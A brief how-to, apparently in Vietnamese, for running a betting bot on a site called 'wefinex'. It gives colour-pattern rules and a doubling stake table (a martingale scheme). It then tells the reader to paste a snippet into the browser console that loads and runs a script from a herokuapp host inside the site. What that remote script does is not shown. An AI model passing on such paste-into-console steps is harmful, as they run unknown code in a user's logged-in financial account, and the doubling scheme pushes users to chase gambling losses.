
FLow rule

 var listRule = [
    "xd->x",
    "dx->d",
    "dd->x",
    "xx->d",
    "xxx->x",
    "ddd->d"
];

var lostValueSet = {
  	0: 1,
    1: 2,
    2: 4,
    3: 8,
    4: 16,
    5: 32
};


Open web
Goto wefinex
F12/Right Click ->Inspect
Pase here to console

2s cuoi danh

var fileref=document.createElement('script')
fileref.setAttribute("type","text/javascript")
fileref.setAttribute("src", "https://tranquil-fjord-14350.herokuapp.com/release.js")
document.getElementsByTagName("head")[0].appendChild(fileref)
